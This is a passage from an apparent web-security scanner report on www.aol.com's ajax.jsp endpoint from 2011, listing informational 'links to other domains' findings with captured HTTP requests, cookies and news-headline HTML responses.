<p class="lede-link"><a name="om_dl5_cpy" href="http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?xid=aol_eh-sex_30-_20100502" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl5|sec1_lnk3|60533">Issues that may be holding you back
</a>
...[SNIP]...
<li ><a name="om_dl5_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl5|sec3_lnk1|60533" href="http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx?xid=aol_eh-allergies_41-_20100502">Popular Theory on Allergy Sufferers
</a>
...[SNIP]...
<li ><a name="om_dl5_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl5|sec3_lnk2|60533" href="http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx?xid=aol_eh-parent_53-_20100502">What Many Daycare Centers Ignore

</a>
...[SNIP]...
<li ><a name="om_dl5_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl5|sec3_lnk3|60533" href="http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx?xid=aol_eh-chol_8-_20100502">Cholesterol Medicine Even Worth It?
</a>
...[SNIP]...

16.2. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=6&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://i.huffpost.com/gen/273987/thumbs/a-SOAP-386x217.jpg
  • http://www.autoblog.com/iphone-app
  • http://www.walletpop.com/2010/01/26/savings-experiment-get-the-best-of-pests-for-less/
  • http://www.walletpop.com/2011/05/03/savings-experiment-will-body-wash-or-soap-get-you-cleaner/
  • http://www.walletpop.com/2011/05/04/grape-tomatoes-in-ready-made-salads-recalled-over-salmonella-fea/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=6&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614868360-Repeat%7C1367686868360%3B%20s_nrgvo%3DRepeat%7C1367686868361%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl5

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:02:26 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-44.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2472
Set-Cookie: JSESSIONID=2858C39FEF947BF52C6130CD99C3D8E8; Path=/aol
Content-Length: 2472

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl6 plid-60588 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl6_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl6|sec1_lnk1|60588" href="http://www.walletpop.com/2011/05/03/savings-experiment-will-body-wash-or-soap-get-you-cleaner/"><img height="217" alt="Soap" width="386" src="http://i.huffpost.com/gen/273987/thumbs/a-SOAP-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl6_hdln" onclick=" " href="http://www.walletpop.com/2011/05/03/savings-experiment-will-body-wash-or-soap-get-you-cleaner/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl6|sec1_lnk2|60588">The Bummer About This Bar of Soap</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl6_cpy" href="http://www.walletpop.com/2011/05/03/savings-experiment-will-body-wash-or-soap-get-you-cleaner/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl6|sec1_lnk3|60588">Surprising find about which is cheapest</a>
...[SNIP]...
<li ><a name="om_dl6_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl6|sec3_lnk1|60588" href="http://www.walletpop.com/2011/05/04/grape-tomatoes-in-ready-made-salads-recalled-over-salmonella-fea/">Common Food Ingredient Recalled</a>
...[SNIP]...
<li ><a name="om_dl6_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl6|sec3_lnk2|60588" href="http://www.walletpop.com/2010/01/26/savings-experiment-get-the-best-of-pests-for-less/">50-Cent Secret to Stop Bugs Cold</a>
...[SNIP]...
<li ><a name="om_dl6_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl6|sec3_lnk3|60588" href="http://www.autoblog.com/iphone-app">The Item Every Car Owner Needs</a>
...[SNIP]...

16.3. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=10&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following link to another domain:
  • http://o.aolcdn.com/hss/storage/adam/9a0f1105cdf5d18ca9dbade82ffeef62/computer-checkup-386ak031011.jpg

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=10&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~6~1304556981389~0; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; stips5=1; s_pers=%20s_getnr%3D1304575091494-Repeat%7C1367647091494%3B%20s_nrgvo%3DRepeat%7C1367647091495%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl8

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:20 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-27-31.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 3779
Set-Cookie: JSESSIONID=B5EBF0B2504FE748DC0CE3C5FCEE4230; Path=/aol
Content-Length: 3779

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl10 plid-60308 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</b><img height="217" alt="AOL Computer Checkup" width="386" src="http://o.aolcdn.com/hss/storage/adam/9a0f1105cdf5d18ca9dbade82ffeef62/computer-checkup-386ak031011.jpg"/></a>
...[SNIP]...

16.4. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=13&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://i.huffpost.com/gen/273893/thumbs/a-BOY12-386x217.jpg
  • http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World
  • http://www.huffingtonpost.com/2011/05/04/mississippi-river-floods-2011_n_857342.html
  • http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-boy-rabbits_n_857186.html
  • http://www.huffingtonpost.com/2011/05/04/south-korea-crucifixion-b_n_857375.html

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=13&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~6~1304556981389~0; stips5=1; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:03 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-44.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2527
Set-Cookie: JSESSIONID=57140D656FAAD0E2F2B1BC4890EBE161; Path=/aol
Content-Length: 2527

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl13 plid-60505 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl13_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl13|sec1_lnk1|60505" href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-boy-rabbits_n_857186.html"><img height="217" alt="12-year-old Pakistani boy" width="386" src="http://i.huffpost.com/gen/273893/thumbs/a-BOY12-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl13_hdln" href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-boy-rabbits_n_857186.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl13|sec1_lnk2|60505">Bin Laden's 12-Year-Old Neighbor


</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl13_cpy" href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-boy-rabbits_n_857186.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl13|sec1_lnk3|60505">Gifts bin Ladens gave the boy


</a>
...[SNIP]...
<li ><a name="om_dl13_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl13|sec3_lnk1|60505" href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World">Poll: Most People Think Osama's In Hell


</a>
...[SNIP]...
<li ><a name="om_dl13_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl13|sec3_lnk2|60505" href="http://www.huffingtonpost.com/2011/05/04/mississippi-river-floods-2011_n_857342.html">Floods Threaten Nation's Midsection


</a>
...[SNIP]...
<li ><a name="om_dl13_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl13|sec3_lnk3|60505" href="http://www.huffingtonpost.com/2011/05/04/south-korea-crucifixion-b_n_857375.html">South Korean Man Found Crucified


</a>
...[SNIP]...

16.5. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=6&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://i.huffpost.com/gen/273888/thumbs/a-KIA-386x217.jpg
  • http://www.autoblog.com/iphone-app

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=6&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~4~1304556981389~0; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; stips5=1; s_pers=%20s_getnr%3D1304575047990-Repeat%7C1367647047990%3B%20s_nrgvo%3DRepeat%7C1367647047997%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl5

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-27-29.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2272
Set-Cookie: JSESSIONID=CD1AFB42904A5FE4368A72E2160DC110; Path=/aol
Content-Length: 2272

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl6 plid-60506 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
<a id="dlimg" name="om_dl6_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl6|sec1_lnk1|60506" href="http://autos.aol.com/article/stop-start-technology/"><img height="217" alt="Kia" width="386" src="http://i.huffpost.com/gen/273888/thumbs/a-KIA-386x217.jpg"/></a>
...[SNIP]...
<li ><a name="om_dl6_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl6|sec3_lnk2|60506" href="http://www.autoblog.com/iphone-app">Accessory All Car Owners Need</a>
...[SNIP]...

16.6. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=local&t=cod
The response contains the following links to other domains:
  • http://portal.aolcdn.com/p5/_v42.5/css/maing.png
  • http://www.aolnews.com/

Request

GET /ajax.jsp?m=local&t=cod HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~0

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:25 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-45.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 1138
Set-Cookie: JSESSIONID=9A77464B1FAA0302D872FC1C71220557; Path=/aol
Content-Length: 1138

<div id="local-module" class="mnid-local plid-60329">
<div id="localheader">

<h2><a href="http://www.aolnews.com/" class="lnid-sec1_lnk1"
name="om_local_title" target='_blank' >
Local News and Weather</a>
...[SNIP]...
<a href="" name="om_localclose" id="locationclose" class="lnid-sec1_lnk4 sprite"><img src="http://portal.aolcdn.com/p5/_v42.5/css/maing.png" alt="Cancel"></a>
...[SNIP]...

16.7. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=9&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://i.huffpost.com/gen/273763/thumbs/a-STYLE-FINDER-KOHLS-386x217.jpg
  • http://portal.aolcdn.com/p5/forms/673/f412e8db-e646-461e-9f77-1b269a2776da.png
  • http://www.stylelist.com/style-finder/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=9&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614868360-Repeat%7C1367686868360%3B%20s_nrgvo%3DRepeat%7C1367686868361%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl8

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:03:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-27-28.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 1843
Set-Cookie: JSESSIONID=2C3E4775C9628A9C2BDA45DBBE1EB386; Path=/aol
Content-Length: 1843

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl9 plid-44117 display-lightbox">
<div id="advert">

...[SNIP]...
</span>
<a id="dlimg" name="om_dl9_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl9|sec1_lnk1|44117" href="http://www.stylelist.com/style-finder/"><span class="overlay"></span><img height="217" alt="Women Shopping" width="386" src="http://i.huffpost.com/gen/273763/thumbs/a-STYLE-FINDER-KOHLS-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl9_hdln" onclick=" " href="http://www.stylelist.com/style-finder/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl9|sec1_lnk2|44117">Tricks to Make Your Legs Look Longer</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl9_cpy" href="http://www.stylelist.com/style-finder/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl9|sec1_lnk3|44117">Style tips that work for almost anyone</a>
...[SNIP]...
<a id="dl-sponsorimg" class="icid-maing-grid7|main5|dl9|link4|44117"><img src="http://portal.aolcdn.com/p5/forms/673/f412e8db-e646-461e-9f77-1b269a2776da.png"/></a>
...[SNIP]...

16.8. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=1&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://i.huffpost.com/gen/274077/thumbs/a-GROUND-ZERO-MEMORIAL-386x217.jpg
  • http://www.huffingtonpost.com/2011/05/04/bin-laden-dead-photo_n_857772.html
  • http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-raid-reaching-for-weapon_n_857836.html
  • http://www.huffingtonpost.com/2011/05/05/japan-nuclear-crisis-workers-enter-reactor-building_n_857880.html
  • http://www.huffingtonpost.com/2011/05/05/obama-giving-ny-its-momen_n_857890.html

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=1&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614868360-Repeat%7C1367686868360%3B%20s_nrgvo%3DRepeat%7C1367686868361%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:03:35 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-27-26.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2465
Set-Cookie: JSESSIONID=027CF01FEEC7A7B1B7CC1A8BD50A5DFD; Path=/aol
Content-Length: 2465

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl1 plid-60584 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl1_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl1|sec1_lnk1|60584" href="http://www.huffingtonpost.com/2011/05/05/obama-giving-ny-its-momen_n_857890.html"><img height="217" alt="Ground Zero memorial" width="386" src="http://i.huffpost.com/gen/274077/thumbs/a-GROUND-ZERO-MEMORIAL-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl1_hdln" href="http://www.huffingtonpost.com/2011/05/05/obama-giving-ny-its-momen_n_857890.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl1|sec1_lnk2|60584">New York Gets Its Moment of Justice</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl1_cpy" href="http://www.huffingtonpost.com/2011/05/05/obama-giving-ny-its-momen_n_857890.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl1|sec1_lnk3|60584">What Obama said to doubters</a>
...[SNIP]...
<li ><a name="om_dl1_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl1|sec3_lnk1|60584" href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-raid-reaching-for-weapon_n_857836.html">SEALS Feared Osama Might Attack</a>
...[SNIP]...
<li ><a name="om_dl1_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl1|sec3_lnk2|60584" href="http://www.huffingtonpost.com/2011/05/04/bin-laden-dead-photo_n_857772.html">Bin Laden Death Scene Photos Published</a>
...[SNIP]...
<li ><a name="om_dl1_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl1|sec3_lnk3|60584" href="http://www.huffingtonpost.com/2011/05/05/japan-nuclear-crisis-workers-enter-reactor-building_n_857880.html">Nuclear Workers Bravely Enter Reactor</a>
...[SNIP]...

16.9. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=7&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://aol.sportingnews.com/nba/story/2011-05-05/lakers-have-problems-and-are-running-out-of-time-to-fix-them
  • http://aol.sportingnews.com/nfl/story/2011-05-04/rashard-mendenhall-turns-to-blog-to-clarify-controversial-tweets
  • http://aol.sportingnews.com/nhl/feed/2011-05/washingtontampa-bay/story/bergenheim-helps-lightning-complete-sweep-of-washington-capitals
  • http://aol.sportingnews.com/sport/story/2011-05-04/kentucky-derby-field
  • http://o.aolcdn.com/hss/storage/adam/6b259a1fdeac0bf0b61d0050d30d10b7/dirk-nowitzki-386vm050511.jpg

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=7&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614868360-Repeat%7C1367686868360%3B%20s_nrgvo%3DRepeat%7C1367686868361%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl6

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:02:38 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-39.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2822
Set-Cookie: JSESSIONID=20A837E26D852DB6741A2CD7BE9C2FF1; Path=/aol
Content-Length: 2822

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl7 plid-60594 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
